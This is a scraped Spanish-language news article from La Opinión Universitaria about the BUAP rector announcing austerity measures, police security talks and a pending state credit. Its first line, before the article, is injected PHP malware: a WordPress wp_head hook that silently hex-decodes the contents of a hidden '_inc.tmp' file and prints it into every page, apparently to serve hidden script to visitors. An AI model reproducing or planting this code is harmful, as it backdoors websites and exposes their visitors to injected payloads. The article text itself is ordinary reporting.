if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Anuncia Esparza Ortiz medidas de austeridad en la BUAP – La Opinión Universitaria La Opinión Universitaria
Menu

Anuncia Esparza Ortiz medidas de austeridad en la BUAP

 

  • Las propuestas serán presentadas al Consejo Universitario

Por Diego Cuautle

Con el objetivo de ahorrar 100 millones de pesos, el rector de la Benemérita Universidad Autónoma de Puebla (BUAP), Alfonso Esparza Ortiz anunció diversas medidas de austeridad en la institución que beneficiará a la matrícula universitaria.

En entrevista luego de la firma de Convenio de Revisión Salarial con el SITBUAP y ASPABUAP comentó que las propuestas que se tienen serán presentadas al Consejo Universitario para que sean analizadas por sus integrantes.

“Seguramente sí, en ciertos niveles, para que podamos tener estos niveles… El ahorro que pretendemos es el que necesitaríamos para redireccionar parte al incremento de matrícula y al reforzamiento de infraestructura”, comentó.

Destacó que entre las nuevas políticas está la disminución de vehículos oficiales, además de menos uso de papelería debido a que todo será a través de vía electrónica como ya se está dando en algunas áreas de la BUAP y que ha sido aceptada.

Además, indicó que el área de Recursos Humanos ya está haciendo un análisis de dónde se podría hacer fusión de actividades y “de algunas dependencias que tienen actividades similares se podrían absorber unas a otras, básicamente serían relacionadas a ll administrativo”.

En este sentido, subrayó que lo ahorrado será destinado al incremento de la matricula así como la ampliación de infraestructura tanto en el plantes centra como en la unidades regionales en el estado, lo cual se sumaría a los 200 millones de pesos que buscan acceder con el crédito que ya se está tramitando.

Esparza Ortiz recordó que la BUAP obtuvo un incremento en los recursos que corresponde al aumento inflacionario y reconoció que el adeudo que la Federación tenía ya fue cubierto.

Reunión con titular de la SSPTM

En otro tema, el rector dio a conocer que en días pasados ha sostenido reuniones con María de Lourdes Rosales, titular de la Secretaría de Seguridad Pública y Tránsito Municipal (SSPTM) para acordar estrategias conjuntas para reforzar la vigilancia en Ciudad Universitaria y en el resto de los planteles.

En trámite petición de 200 millones de pesos

Por otra parte, también comentó que la solicitud de financiamiento aún está en ser aprobado por parte del Congreso del Estado por lo que están a la espera de la respuesta que podría conocerse en esta semana.

 

No comments

Deja una respuesta

Tweets recientes